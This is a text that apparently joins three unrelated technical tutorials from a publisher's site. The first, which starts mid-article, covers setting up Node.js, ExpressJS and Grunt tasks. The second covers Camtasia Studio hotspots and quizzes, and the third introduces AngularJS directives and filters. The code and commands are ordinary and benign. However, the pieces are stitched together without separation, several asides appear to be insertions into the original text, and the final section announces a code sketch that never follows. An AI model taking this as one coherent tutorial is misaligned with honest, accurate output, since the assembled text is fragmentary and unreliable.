Let us head over to www.nodejs.org and install Node.js. Choose the right version as per your operating system. The current version of Node.js at the time of writing this article is v0.10.x, which comes with npm built in, making it a breeze to set up Node.js and npm.

Node.js doesn't come with a Graphical User Interface (GUI), so to use Node.js, you will need to open up your terminal and start firing some commands. Now would also be a good time to brush up on your DOS and Unix/Linux commands. After installing Node.js, the first thing you'd want to check is whether Node.js has been installed correctly. So, let us open up the terminal and write the following command:

node --version

This should output the version number of Node.js that's installed on your system. The next step would be to see what version of npm we have installed. The command for that would be as follows:

npm --version

This will tell you the version number of your npm.

Creating a simple Node.js web server with ExpressJS

For basic, simple AngularJS apps, you don't really need a web server. You can simply open the HTML files from your filesystem and they will work just fine. However, as you start building complex applications where you are passing data in JSON, consuming web services, or using a Content Delivery Network (CDN), you will find the need to use a web server. The good thing about AngularJS apps is that they can work within any web server, so if you already have IIS, Apache, Nginx, or any other web server running on your development environment, you can simply run your AngularJS project from within the web root folder. In case you don't have a web server and are looking for a lightweight one, then let us set one up using Node.js and ExpressJS. One could write the entire web server in pure Node.js; however, ExpressJS provides a nice layer of abstraction on top of Node.js so that you can just work with the ExpressJS APIs and don't have to worry about the low-level calls. So, let's first install the ExpressJS module for Node.js.
Open up your terminal and fire the following command:

npm install -g express-generator

This will globally install ExpressJS. Omit the -g to install ExpressJS locally in the current folder. When installing ExpressJS globally on Linux or Mac, you will need to run it via sudo as follows:

sudo npm install -g express-generator

This will let npm have the necessary permissions to write to the protected local folder under the user. The next step is to create an ExpressJS app; let us call it my-server. Type the following command in the terminal and hit Enter:

express my-server

You'll see something like this:

create : my-server
create : my-server/package.json
create : my-server/app.js
create : my-server/public
create : my-server/public/javascripts
create : my-server/public/images
create : my-server/public/stylesheets
create : my-server/public/stylesheets/style.css
create : my-server/routes
create : my-server/routes/index.js
create : my-server/routes/user.js
create : my-server/views
create : my-server/views/layout.jade
create : my-server/views/index.jade

install dependencies:
$ cd my-server && npm install

run the app:
$ DEBUG=my-server ./bin/www

This will create a folder called my-server and put a bunch of files inside it. The package.json file is created, which contains the skeleton of your app. Open it and ensure the name says my-server; also, note the dependencies listed. Now, to install ExpressJS along with the dependencies, first change into the my-server directory and run the following commands in the terminal:

cd my-server
npm install

Now, in the terminal, type in the following command:

npm start

Open your browser and type http://localhost:3000 in the address bar. You'll get a nice ExpressJS welcome message. Now, to test our Address Book app, we will copy our index.html, scripts.js, and styles.css into the public folder located within my-server. I'm not copying the angular.js file because we'll use the CDN version of the AngularJS library. Open up the index.html file and replace the following code:

<script src="angular.min.js" type="text/javascript"></script>

With the CDN version of AngularJS as follows:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.2.17/angular.min.js"></script>

A question might arise as to what happens if the CDN is unreachable. In such cases, we can add a fallback to use a local version of the AngularJS library. We do this by adding the following script after the CDN link is called:

<script>window.angular || document.write('<script src="lib/angular/angular.min.js"></script>');</script>

Save the file, and in the browser, enter localhost:3000/index.html. Your Address Book app is now running from a server and taking advantage of Google's CDN to serve the AngularJS file.

Referencing the files using only // is also called a protocol-independent absolute path. This means that the files are requested using the same protocol that is being used to call the parent page. For example, if the page you are loading is served via https://, then the CDN link will also be called via HTTPS. This also means that when using // instead of http:// during development, you will need to run your app from within a server instead of a filesystem.
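As an aside, if you'd rather not use the generator, a static file server can also be written by hand in a few lines. This is a minimal sketch, not part of the original tutorial; it assumes ExpressJS is installed locally (npm install express):

var express = require('express');
var app = express();

// Serve everything inside the public folder as static assets
app.use(express.static('public'));

app.listen(3000, function () {
  console.log('Server running at http://localhost:3000');
});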
Setting up Grunt

Grunt is a JavaScript-based task runner. It is primarily used for automating tasks such as running unit tests and concatenating, merging, and minifying JS and CSS files. You can also run shell commands. This makes it super easy to perform server cleanups and deploy code. Essentially, Grunt is to JavaScript what Rake would be to Ruby or Ant/Maven would be to Java.

Installing Grunt-cli

Installing Grunt-cli is slightly different from installing other Node.js modules. We first need to install Grunt's Command Line Interface (CLI) by firing the following command in the terminal:

npm install -g grunt-cli

Mac or Linux users can also directly run the following command:

sudo npm install -g grunt-cli

Make sure you have administrative privileges. Use sudo if you are on a Mac or Linux system. If you are on Windows, right-click and open the command prompt with administrative rights. An important thing to note is that installing Grunt-cli doesn't automatically install Grunt and its dependencies. Grunt-cli merely invokes the version of Grunt installed along with the Grunt file. While this may seem a little complicated at the start, the reason it works this way is so that we can run different versions of Grunt on the same machine. This comes in handy when your project has dependencies on a specific version of Grunt.

Creating the package.json file

To install Grunt, let's first create a folder called my-project and create a file called package.json with the following content:

{
  "name": "My-Project",
  "version": "0.1.0",
  "devDependencies": {
    "grunt": "~0.4.5",
    "grunt-contrib-jshint": "~0.10.0",
    "grunt-contrib-concat": "~0.4.0",
    "grunt-contrib-uglify": "~0.5.0",
    "grunt-shell": "~0.7.0"
  }
}

Save the file. The package.json file is where you define the various parameters of your app; for example, the name of your app, the version number, and the list of dependencies needed for the app. Here we are calling our app My-Project, with version 0.1.0, and listing out the following dependencies that need to be installed as a part of this app:

grunt (v0.4.5): This is the main Grunt application
grunt-contrib-jshint (v0.10.0): This is used for code analysis
grunt-contrib-concat (v0.4.0): This is used to merge two or more files into one
grunt-contrib-uglify (v0.5.0): This is used to minify the JS file
grunt-shell (v0.7.0): This is the Grunt shell used for running shell commands

Visit http://gruntjs.com/plugins to get a list of all the plugins available for Grunt, along with their exact names and version numbers. You may also choose to create a default package.json file by running the following command and answering the questions:

npm init

Open the package.json file and add the dependencies as mentioned earlier. Now that we have the package.json file, load the terminal and navigate into the my-project folder. To install Grunt and the modules specified in the file, type in the following command:

npm install --save-dev

You'll see a series of lines getting printed in the console; let that continue for a while and wait until it returns to the command prompt. Ensure that the last line printed by the previous command ends with OK code 0. Once Grunt is installed, a quick version check will ensure that Grunt is installed correctly. The command is as follows:

grunt --version

There is a possibility that you got a bunch of errors and it ended with a not ok code 0 message. There could be multiple reasons why that might have happened, ranging from errors in your code to a network connection issue or something changing at Grunt's end due to a new version update. If grunt --version throws up an error, it means Grunt wasn't installed properly.
To reinstall Grunt, enter the following commands in the terminal:

rm -rf node_modules
npm cache clean
npm install

Windows users may manually delete the node_modules folder from Windows Explorer before running the cache clean command in the command prompt. Refer to http://www.gruntjs.com to troubleshoot the problem.

Creating your Grunt tasks

To run our Grunt tasks, we'll need a JavaScript file. So, let's copy our scripts.js file and place it into the my-project folder. The next step is to create a Grunt file that will list out the tasks that we need Grunt to perform. For now, we will ask it to do four simple tasks: first, check whether our JS code is clean using JSHint; then merge three JS files into one; then minify the merged JS file; and finally run some shell commands to clean up.

Until Version 0.3, the init command was a part of the Grunt tool and one could create a blank project using grunt-init. With Version 0.4, init is now available as a separate tool called grunt-init and needs to be installed using the npm install -g grunt-init command. Also note that the structure of the grunt.js file from Version 0.4 onwards is fairly different from the earlier versions you may have used. For now, we will resort to creating the Grunt file manually.

In the same location where you have your package.json, create a file called gruntfile.js and type in the following code:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    jshint: {
      all: ['scripts.js']
    }
  });

  grunt.loadNpmTasks('grunt-contrib-jshint');

  // Default task.
  grunt.registerTask('default', ['jshint']);
};

To start, we will add only one task, which is jshint, and specify scripts.js in the list of files that need to be linted. In the next line, we specify grunt-contrib-jshint as the npm task that needs to be loaded. In the last line, we define jshint as the task to be run when Grunt is running in default mode. Save the file and in the terminal run the following command:

grunt

You will probably get a message in the terminal saying that we are missing a semicolon on lines 18 and 24. Oh! Did I mention that JSHint is like your very strict math teacher from high school? Let's open up scripts.js, put in those semicolons, and rerun Grunt. Now you should get a message in green saying 1 file lint free. Done, without errors.

Let's add some more tasks to Grunt. We'll now ask it to concatenate and minify a couple of JS files. Since we currently have just one file, let's go and create two dummy JS files called scripts1.js and scripts2.js. In scripts1.js, we'll simply write an empty function as follows:

// This is from script 1
function Script1Function(){
  //------//
}

Similarly, in scripts2.js we'll write the following:

// This is from script 2
function Script2Function(){
  //------//
}

Save these files in the same folder where you have scripts.js.

Grunt tasks to merge and concatenate files

Now, let's open our Grunt file and add the code for both tasks, to merge the JS files and minify them, as follows:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    jshint: {
      all: ['scripts.js']
    },
    concat: {
      dist: {
        src: ['scripts.js', 'scripts1.js', 'scripts2.js'],
        dest: 'merged.js'
      }
    },
    uglify: {
      dist: {
        src: 'merged.js',
        dest: 'build/merged.min.js'
      }
    }
  });

  grunt.loadNpmTasks('grunt-contrib-jshint');
  grunt.loadNpmTasks('grunt-contrib-concat');
  grunt.loadNpmTasks('grunt-contrib-uglify');

  // Default task.
  grunt.registerTask('default', ['jshint', 'concat', 'uglify']);
};

As you can see from the preceding code, after the jshint task, we added the concat task. Under the src attribute, we define the files, separated by commas, that need to be concatenated. And in the dest attribute, we specify the name of the merged JS file. It is very important that the files are entered in the same sequence in which they need to be merged. If the sequence of the files entered is incorrect, the merged JS file will cause errors in your app.

The uglify task is used to minify the JS file, and its structure is very similar to that of the concat task. We add the merged.js file to the src attribute, and in the dest attribute we place the merged.min.js file into a folder called build. Grunt will auto-create the build folder.

After defining the tasks, we load the necessary plugins, namely grunt-contrib-concat and grunt-contrib-uglify, and finally we register the concat and uglify tasks to the default task. Save the file and run Grunt. If all goes well, you should see Grunt running these tasks and reporting the status of each of them. If you get the final message saying Done, without errors, it means things went well, and this was your lucky day! If you now open your my-project folder in the file manager, you should see a new file called merged.js. Open it in the text editor and you'll notice that all three files have been merged into it. Also, go into the build/merged.min.js file and verify that the file is minified.

Running shell commands via Grunt

Another really helpful plugin in Grunt is grunt-shell. This allows us to effectively run clean-up activities such as deleting .tmp files and moving files from one folder to another. Let's see how to add the shell tasks to our Grunt file. Add the following highlighted piece of code to your Grunt file:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    jshint: {
      all: ['scripts.js']
    },
    concat: {
      dist: {
        src: ['scripts.js', 'scripts1.js', 'scripts2.js'],
        dest: 'merged.js'
      }
    },
    uglify: {
      dist: {
        src: 'merged.js',
        dest: 'build/merged.min.js'
      }
    },
    shell: {
      multiple: {
        command: [
          'rm -rf merged.js',
          'mkdir deploy',
          'mv build/merged.min.js deploy/merged.min.js'
        ].join('&&')
      }
    }
  });

  grunt.loadNpmTasks('grunt-contrib-jshint');
  grunt.loadNpmTasks('grunt-contrib-concat');
  grunt.loadNpmTasks('grunt-contrib-uglify');
  grunt.loadNpmTasks('grunt-shell');

  // Default task.
  grunt.registerTask('default', ['jshint', 'concat', 'uglify', 'shell']);
};

As you can see from the code we added, we are first deleting the merged.js file, then creating a new folder called deploy and moving our merged.min.js file into it. Windows users would need to use the appropriate DOS commands for deleting and copying the files. Note that .join('&&') is used when you want Grunt to run multiple shell commands. The next steps are to load the npm tasks and add shell to the default task list. To see Grunt perform all these tasks, run the grunt command in the terminal. Once it's done, open up the filesystem and verify that Grunt has done what you asked it to do. Just like we used the preceding four plugins, there are numerous other plugins that you can use with Grunt to automate your tasks.
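Returning to the shell task above: for Windows users, a rough equivalent might look like the following. This is an untested sketch using common DOS commands; adjust it for your environment:

shell: {
  multiple: {
    command: [
      'del merged.js',
      'mkdir deploy',
      'move build\\merged.min.js deploy\\merged.min.js'
    ].join('&&')
  }
}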
A point to note is that while the default grunt command will run all the tasks mentioned in the grunt.registerTask statement, if you need to run a specific task instead of all of them, then you can simply type the following in the command line:

grunt jshint

Alternatively, you can type the following command:

grunt concat

Alternatively, you can type the following command:

grunt uglify

At times, if you'd like to run just two of the three tasks, then you can register them separately as another bundled task in the Grunt file. Open up the gruntfile.js file, and just after the line where you have registered the default task, add the following code:

grunt.registerTask('concat-min', ['concat', 'uglify']);

This will register a new task called concat-min, which will run only the concat and uglify tasks. In the terminal, run the following command:

grunt concat-min

Verify that Grunt only concatenated and minified the file and didn't run JSHint or your shell commands. You can run grunt --help to see a list of all the tasks available in your Grunt file.
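You can also register a small custom task of your own directly in the Grunt file. This is a minimal sketch, not part of the original exercise:

grunt.registerTask('hello', 'Prints a greeting', function () {
  grunt.log.writeln('Hello from a custom Grunt task!');
});

Running grunt hello would then print the greeting, and the task will show up in the grunt --help listing alongside the others.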


Quizzes and Interactions in Camtasia Studio

Packt
21 Aug 2014
12 min read
This article by David B. Demyan, the author of the book eLearning with Camtasia Studio, covers the different types of interactions, a description of how interactions are created and how they function, and the quiz feature. In this article, we will cover the following specific topics:

The types of interactions available in Camtasia Studio
Video player requirements
Creating simple action hotspots
Using the quiz feature

Why include learner interactions?

Interactions in e-learning support cognitive learning, the application of behavioral psychology to teaching. Students learn a lot when they perform an action based on the information they are presented. Without exhausting the volumes written about this subject, your own background has probably prepared you for creating effective materials that support cognitive learning. To boil it down for our purposes, you present information in chunks and ask learners to demonstrate whether they have received the signal. In the classroom, this is immortalized as a teacher presenting a lecture and asking questions, a basic educational model. In another scenario, it might be an instructor showing a student how to perform a mechanical task and then asking the student to repeat the same task.

We know from experience that learners struggle with concepts if you present too much information too rapidly without checking to see if they understand it. In e-learning, the most effective ways to prevent confusion involve chunking information into small, digestible bites and mapping them into an overall program that allows the learner to progress in a logical fashion, all the while interacting and demonstrating comprehension. Interaction is vital to keep your students awake and aware. Interaction, or two-way communication, can take your e-learning video to the next level: a true cognitive learning experience.

Interaction types

While Camtasia Studio does not pretend to be a full-featured interactive authoring tool, it does contain some features that allow you to build interactions and quizzes. This section defines the features that allow learners to take action while viewing an e-learning video when you ask them for an interaction. There are three types of interactions available in Camtasia Studio:

Simple action hotspots
Branching hotspots
Quizzes

You are probably thinking of ways these techniques can help support cognitive learning.

Simple action hotspots

Hotspots are click areas. You indicate where the hotspot is using a visual cue, such as a callout. Camtasia allows you to designate the area covered by the callout as a hotspot and define the action to take when it is clicked. An example is to take the learner to another time in the video when the hotspot is clicked. Another click could take the learner back to the original place in the video.

Quizzes

Quizzes are simple questions you can insert in the video, created and implemented to conform to your testing strategy. The question types available are as follows:

Multiple choice
Fill in the blanks
Short answers
True/false

Video player requirements

Before we learn how to create interactions in Camtasia Studio, you should know about some special video player requirements. A simple video file playing on a computer cannot be interactive by itself. A video created and produced in Camtasia Studio, without including some additional program elements, cannot react when you click on it, except for what the video player tells it to do.
For example, the default player for YouTube videos stops and starts the video when you click anywhere in the video space. Click interactions in videos created with Camtasia are able to recognize where clicks occur and the actions to take. You provide the click instructions when you set up the interaction. These instructions are required, for example, to intercept the clicking action, determine where exactly the click occurred, and link that spot with a command and destination. These click instructions may be any combination of HyperText Markup Language (HTML), HTML5, JavaScript, and Flash ActionScript. Camtasia takes care of creating the coding behind the scenes, associated with the video player being used. In the case of videos produced with Camtasia Studio, to implement any form of interactivity, you need to select the default Smart Player output options when producing the video.

Creating simple hotspots

The most basic interaction is clicking a hotspot layered over the video. You can create an interactive hotspot for many purposes, including the following:

Taking learners to a specific marker or frame within the video, as determined on the timeline
Allowing learners to replay a section of the video
Directing learners to a website or document to view reference material
Showing a pop up with additional information, such as a phone number or web link

Try it – creating a hotspot

If you are building the exercise project featured in this book, let's use it to create an interactive hotspot. The task in this exercise is to pause the video and add a Replay button to allow viewers to review a task. After the replay, a prompt will be added to resume the video from where it was paused.

Inserting the Replay/Continue buttons

The first step is to insert a Replay button to allow viewers to review what they just saw, or continue without reviewing. This involves adding two hotspot buttons on the timeline, which can be done by performing the following steps:

1. Open your exercise project in Camtasia Studio, or one of your own projects where you can practice.
2. Position the play head right after the part where text is shown being pasted into the CuePrompter window.
3. From the Properties area, select Callouts from the task tabs above the timeline.
4. In the Shape area, select Filled Rounded Rectangle (at the upper-right corner of the drop-down selection). A shape is added to the timeline.
5. Set the Fade in and Fade out durations to about half a second.
6. Select the Effects dropdown and choose Style.
7. Choose the 3D Edge style. It looks like a raised button.
8. Set any other formatting so the button looks the way you want in the preview window.
9. In the Text area, type your button text. For the sample project, enter Replay Copy & Paste.
10. Select the button in the preview window and make a copy of it. You can use Ctrl + C to copy and Ctrl + V to paste the button.
11. In the second copy of the button, select the text and retype it as Continue. The two buttons should be stacked on the timeline.
12. Select the Continue button in the preview window and drag it to the right-hand side, at the same height and distance from the edge. The final placement of the buttons is shown in the sample project.
13. Save the project.

Adding a hotspot to the Continue button

The buttons are currently inactive images on the timeline. Viewers could click them in the produced video, but nothing would happen. To make them active, enable the Hotspot properties for each button.
To add a hotspot to the Continue button, perform the following steps:

1. With the Continue button selected, select the Make hotspot checkbox in the Callouts panel.
2. Click on the Hotspot Properties... button to set the properties for the callout button.
3. Under Actions, make sure to select Click to continue.
4. Click on OK.

The Continue button now has an active hotspot assigned to it. When published, the video will pause when the button appears. When the viewer clicks on Continue, the video will resume playing. You can test the video and the operation of the interactive buttons as described later in this article.

Adding a hotspot to the Replay button

Now, let's move on to create an action for the Replay copy & paste button:

1. Select the Replay copy & paste button in the preview window.
2. Select the Make hotspot checkbox in the Callouts panel.
3. Click on the Hotspot properties... button.
4. Under Actions, select Go to frame at time.
5. Enter the time code for the spot on the timeline where you want to start the replay. In the sample video, this is around 0:01:43;00, just before text is copied in the script.
6. Click on OK.
7. Save the project.

The Replay copy & paste button now has an active hotspot assigned to it. Later, when published, the video will pause when the button appears. When viewers click on Replay copy & paste, the video will be repositioned at the time you entered and begin playing from there.

Using the quiz feature

A quiz added to a video sets it apart. The addition of knowledge checks and quizzes to assess your learners' understanding of the material presented puts the video into the true e-learning category. By definition, a knowledge check is a way for students to check their understanding without worrying about scoring. Typically, feedback is given to the student so they can better understand the material, the question, and their answer. The feedback can be terse, such as correct and incorrect, or it can be verbose, informing them whether the answer is correct or not and perhaps giving additional information, a hint, or even the correct answers, depending on your strategy in creating the knowledge check.

A quiz can be in the same form as a knowledge check, but a record of the student's answer is created and reported to an LMS or via an e-mail report. Feedback to the student is optional, again depending on your testing strategy. In Camtasia Studio, you can insert a quiz question or a set of questions anywhere on the timeline you deem appropriate. This is done with the Quizzing task tab.

Try it – inserting a quiz

In this exercise, you will select a spot on the timeline to insert a quiz, enable the Quizzing feature, and write some appropriate questions following the sample project, Using CuePrompter.

Creating a quiz

Place your quiz after you have covered a block of information. The sample project, Using CuePrompter, is a very short task-based tutorial showing some basic steps. Assume for now that you are teaching a course on CuePrompter and need to assess students' knowledge. I believe a good place for a quiz is after the commands to scroll forward, speed up, slow down, and scroll in reverse. Let's give it a try with multiple choice and true/false questions:

1. Position the play head at the appropriate part of the timeline. In the sample video, the end of the scrolling command description is at about 3 minutes 12 seconds.
2. Select Quizzing in the task tabs. If you do not see the Quizzing tab above the timeline, select the More tab to reveal it.
3. Click on the Add quiz button to begin adding questions.
A marker appears on the timeline where your quiz will appear during the video. Continue with the following steps:

4. In the Quiz panel, add a quiz name. In the sample project, the quiz is entitled CuePrompter Commands.
5. Scroll down to Question type. Make sure Multiple Choice is selected from the dropdown.
6. In the Question box, type the question text. In the sample project, the first question is With text in the prompter ready to go, the keyboard control to start scrolling forward is _________________.
7. In the Answers box, double-click on the checkbox text that says Default Answer Text. Retype the answer Control-F.
8. In the next checkbox text that says <Type an answer choice here>, double-click on it and add the second possible answer, Spacebar. Check the box next to it to indicate that it is the correct answer.
9. Add two more choices: Alt-Insert and Tab.
10. Click on Add question.
11. From the Question type dropdown, select True/False.
12. In the Question box, type You can stop CuePrompter with the End key.
13. In Answers, select False.
14. For the final question, click on Add question again.
15. From the Question type dropdown, select Multiple Choice.
16. In the Question box, type Which keyboard command tells CuePrompter to reverse?
17. Enter the four possible answers: Left arrow, Right arrow, Down arrow, and Up arrow.
18. Select Down arrow as the correct answer.
19. Save the project.

Now you have entered three questions and their answer choices, while indicating the choice that will be scored correct if selected. Next, preview the quiz to check its format and function.

Previewing the quiz

Camtasia Studio allows you to preview quizzes to check their formatting, wording, and scoring. Continue to follow along in the exercise project and perform the following steps:

1. Leave checkmarks in the Score quiz and Viewer can see answers after submitting boxes.
2. Click on the Preview button. A web page opens in your Internet browser showing the questions.
3. Select an answer and click on Next. The second quiz question is displayed.
4. Select an answer and click on Next. The third quiz question is displayed.
5. Select an answer and click on Submit Answers. As this is the final question, there is no Next.
6. Since we left the Score quiz and Viewer can see answers after submitting options selected, the learner receives a score prompt.
7. Click on View Answers to review the answers you gave. Correct responses are shown with a green checkmark and incorrect ones are shown with a red X mark.
8. If you do not want your learners to see the answers, remove the checkmark from Viewer can see answers after submitting.
9. Exit the browser to discontinue previewing the quiz.
10. Save the project.

This completes the Try it exercise for inserting and previewing a quiz in your video e-learning project.

Summary

In this article, we learned about the different types of interactions, video player requirements, creating simple action hotspots, and inserting and previewing a quiz.

Resources for Article:

Further resources on this subject:
Introduction to Moodle [article]
Installing Drupal [article]
Make Spacecraft Fly and Shoot with Special Effects using Blender 3D 2.49 [article]

AngularJS

Packt
20 Aug 2014
15 min read
In this article, by Rodrigo Branas, author of the book AngularJS Essentials, we will go through the basics of AngularJS. Created by Miško Hevery and Adam Abrons in 2009, AngularJS is an open source, client-side JavaScript framework that promotes a high-productivity web development experience. It was built on the belief that declarative programming is the best choice to construct the user interface, while imperative programming is much better suited to implementing the application's business logic. To achieve that, AngularJS empowers traditional HTML by extending its current vocabulary, making the life of developers easier. The result is the development of expressive, reusable, and maintainable application components, leaving behind a lot of unnecessary code and keeping the team focused on the valuable and important things.

Architectural concepts

It's been a long time since the famous Model-View-Controller, also known as MVC, started to be widely used in the software development industry, thereby becoming one of the legends of enterprise architecture design. Basically, the model represents the knowledge that the view is responsible for presenting, while the controller mediates their relationship. However, these concepts are a little bit abstract, and this pattern may have different implementations depending on the language, platform, and purposes of the application. After a lot of discussion about which architectural pattern the framework follows, its authors declared that, from now on, AngularJS is adopting Model-View-Whatever (MVW). Regardless of the name, the most important benefit is that the framework provides a clear separation of concerns between the application layers, providing modularity, flexibility, and testability.

In terms of concepts, a typical AngularJS application consists primarily of a view, model, and controller, but there are other important components, such as services, directives, and filters.

The view, also called the template, is written entirely in HTML, which becomes a great opportunity to see web designers and JavaScript developers working side by side. It also takes advantage of the directives mechanism, a kind of extension of the HTML vocabulary that brings the ability to perform programming language tasks, such as iterating over an array or even evaluating an expression conditionally.

Behind the view, there is the controller. At first, the controller contains all the business logic implementation used by the view. However, as the application grows, it becomes really important to perform some refactoring activities, such as moving code from the controller to other components like services, in order to keep the cohesion high.

The connection between the view and the controller is made by a shared object called the scope. It is located between them and is used to exchange information related to the model.

The model is a simple Plain-Old-JavaScript-Object (POJO). It looks very clear and easy to understand, bringing simplicity to the development by not requiring any special syntax to be created.

Setting up the framework

The configuration process is very simple. In order to set up the framework, we start by importing the angular.js script into our HTML file. After that, we need to create the application module by calling the module function from Angular's API, with its name and dependencies.
With the module already created, we just need to place the ng-app attribute with the module's name inside the html element, or any other element that surrounds the application. This attribute is important because it supports the initialization process of the framework.

In the following code, there is an introductory application about a parking lot. At first, we are able to add and also list the parked cars, storing their plates in memory. Throughout the book, we will evolve this parking control application by incorporating each newly studied concept.

index.html

<!doctype html>
<!-- Declaring the ng-app -->
<html ng-app="parking">
<head>
  <title>Parking</title>
  <!-- Importing the angular.js script -->
  <script src="angular.js"></script>
  <script>
    // Creating the module called parking
    var parking = angular.module("parking", []);
    // Registering the parkingCtrl to the parking module
    parking.controller("parkingCtrl", function ($scope) {
      // Binding the cars array to the scope
      $scope.cars = [
        {plate: '6MBV006'},
        {plate: '5BBM299'},
        {plate: '5AOJ230'}
      ];
      // Binding the park function to the scope
      $scope.park = function (car) {
        $scope.cars.push(angular.copy(car));
        delete $scope.car;
      };
    });
  </script>
</head>
<!-- Attaching the view to the parkingCtrl -->
<body ng-controller="parkingCtrl">
  <h3>[Packt] Parking</h3>
  <table>
    <thead>
      <tr>
        <th>Plate</th>
      </tr>
    </thead>
    <tbody>
      <!-- Iterating over the cars -->
      <tr ng-repeat="car in cars">
        <!-- Showing the car's plate -->
        <td>{{car.plate}}</td>
      </tr>
    </tbody>
  </table>
  <!-- Binding the car object, with plate, to the scope -->
  <input type="text" ng-model="car.plate"/>
  <!-- Binding the park function to the click event -->
  <button ng-click="park(car)">Park</button>
</body>
</html>

The ngController directive was used to bind the parkingCtrl to the view, while ngRepeat iterated over the cars array. Also, we employed expressions like {{car.plate}} to display the plate of the car. Finally, to add new cars, we applied the ngModel directive, which creates a new object called car with the plate property, passing it as a parameter of the park function, called through the ngClick directive.

To improve page loading performance, it is recommended to use the minified and obfuscated version of the script, which can be identified as angular.min.js. Both the minified and regular distributions of the framework can be found on the official site of AngularJS, that is, http://www.angularjs.org, or they can be directly referenced from the Google Content Delivery Network (CDN).

What is a directive?

A directive is an extension of the HTML vocabulary that allows the creation of new behaviors. This technology lets developers create reusable components that can be used within the whole application, and they can even provide their own custom components. A directive may be applied as an attribute, element, class, or even as a comment, using the camelCase syntax. However, because HTML is case-insensitive, we need to use the lowercase form. For the ngModel directive, we can use ng-model, ng:model, ng_model, data-ng-model, or x-ng-model in the HTML markup.

Using AngularJS built-in directives

By default, the framework brings a basic set of directives to do things such as iterate over an array, execute a custom behavior when an element is clicked, or show a given element based on a conditional expression, among many others.

ngBind

This directive is generally applied to a span element and replaces the content of the element with the result of the provided expression.
It has the same meaning as the double curly markup, for example, {{expression}}. Why would anyone like to use this directive when a less verbose alternative is available? This is because, when the page is being compiled, there is a moment when the raw state of the expressions is shown. Since the directive is defined by an attribute of the element, it is invisible to the user. Here is an example of the ngBind directive usage:

index.html

<!doctype html>
<html ng-app="parking">
<head>
  <title>[Packt] Parking</title>
  <script src="angular.js"></script>
  <script>
    var parking = angular.module("parking", []);
    parking.controller("parkingCtrl", function ($scope) {
      $scope.appTitle = "[Packt] Parking";
    });
  </script>
</head>
<body ng-controller="parkingCtrl">
  <h3 ng-bind="appTitle"></h3>
</body>
</html>

ngRepeat

The ngRepeat directive is really useful for iterating over arrays and objects. It can be used with any kind of element, such as the rows of a table, the elements of a list, and even the options of select. We must provide a special repeat expression that describes the array to iterate over and the variable that will hold each item in the iteration. The most basic expression format allows us to iterate over an array, attributing each element to a variable:

variable in array

In the following code, we will iterate over the cars array and assign each element to the car variable:

index.html

<!doctype html>
<html ng-app="parking">
<head>
  <title>[Packt] Parking</title>
  <script src="angular.js"></script>
  <script>
    var parking = angular.module("parking", []);
    parking.controller("parkingCtrl", function ($scope) {
      $scope.appTitle = "[Packt] Parking";
      $scope.cars = [];
    });
  </script>
</head>
<body ng-controller="parkingCtrl">
  <h3 ng-bind="appTitle"></h3>
  <table>
    <thead>
      <tr>
        <th>Plate</th>
        <th>Entrance</th>
      </tr>
    </thead>
    <tbody>
      <tr ng-repeat="car in cars">
        <td><span ng-bind="car.plate"></span></td>
        <td><span ng-bind="car.entrance"></span></td>
      </tr>
    </tbody>
  </table>
</body>
</html>

ngModel

The ngModel directive attaches the element to a property in the scope, binding the view to the model. In this case, the element could be input (all types), select, or textarea.

<input type="text" ng-model="car.plate" placeholder="What's the plate?" />

There is an important piece of advice regarding the use of this directive. We must pay attention to the purpose of the field that is using the ngModel directive. Every time the field is part of the construction of an object, we must declare the object in which the property should be attached. In this case, the object being constructed is a car, so we use car.plate inside the directive expression. However, sometimes there is an input field that is just used to change a flag, allowing the control of the state of a dialog or another UI component. In these cases, we may use the ngModel directive without any object, as long as it will not be used together with other properties or be persisted.

ngClick and other event directives

The ngClick directive is one of the most useful kinds of directives in the framework. It allows you to bind any custom behavior to the click event of the element.
The following code is an example of the usage of the ngClick directive calling a function:

index.html

<!doctype html>
<html ng-app="parking">
<head>
  <title>[Packt] Parking</title>
  <script src="angular.js"></script>
  <script>
    var parking = angular.module("parking", []);
    parking.controller("parkingCtrl", function ($scope) {
      $scope.appTitle = "[Packt] Parking";
      $scope.cars = [];
      $scope.park = function (car) {
        car.entrance = new Date();
        $scope.cars.push(car);
        delete $scope.car;
      };
    });
  </script>
</head>
<body ng-controller="parkingCtrl">
  <h3 ng-bind="appTitle"></h3>
  <table>
    <thead>
      <tr>
        <th>Plate</th>
        <th>Entrance</th>
      </tr>
    </thead>
    <tbody>
      <tr ng-repeat="car in cars">
        <td><span ng-bind="car.plate"></span></td>
        <td><span ng-bind="car.entrance"></span></td>
      </tr>
    </tbody>
  </table>
  <input type="text" ng-model="car.plate" placeholder="What's the plate?" />
  <button ng-click="park(car)">Park</button>
</body>
</html>

Here is another pitfall. Inside the ngClick directive, we call the park function, passing the car as a parameter. Since we have access to the scope through the controller, wouldn't it be easier to just access it directly, without passing any parameter at all? Keep in mind that we must take care of the coupling level between the view and the controller. One way to keep it low is to avoid reading the scope object directly from the controller, and instead pass everything the controller needs as parameters from the view. This will increase the controller's testability and also make things clearer and more explicit.

Other directives that have the same behavior, but are triggered by other events, are ngBlur, ngChange, ngCopy, ngCut, ngDblClick, ngFocus, ngKeyPress, ngKeyDown, ngKeyUp, ngMousedown, ngMouseenter, ngMouseleave, ngMousemove, ngMouseover, ngMouseup, and ngPaste.

Filters

Filters, associated with other technologies like directives and expressions, are responsible for the extraordinary expressiveness of the framework. They let us easily manipulate and transform any value, not only combined with expressions inside a template, but also injected into other components, such as controllers and services. Filters are really useful when we need to format dates and money according to our current locale, or even to support the filtering feature of a grid component. They are the perfect answer to easily perform any kind of data manipulation.

currency

The currency filter is used to format a number based on a currency. The basic usage of this filter is without any parameters:

{{ 10 | currency }}

The result of the evaluation will be the number $10.00, formatted and prefixed with the dollar sign. In order to achieve the correct output for other locales, in this case R$10,00 instead of R$10.00, we need to configure the Brazilian (PT-BR) locale, available inside the AngularJS distribution package. There, we may find locales for most countries, and we just need to import the one we need into our application, such as:

<script src="js/lib/angular-locale_pt-br.js"></script>

After importing the locale, we will not need to use the currency symbol anymore because it is already wrapped inside. Besides the currency, the locale also defines the configuration of many other variables, like the days of the week and months, which is very useful when combined with the next filter, used to format dates.
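Filters are not limited to templates; as mentioned above, they can also be injected into other components. The following is a minimal sketch of invoking a filter programmatically through the $filter service inside a controller. The reportCtrl controller is illustrative and not part of the book's parking application:

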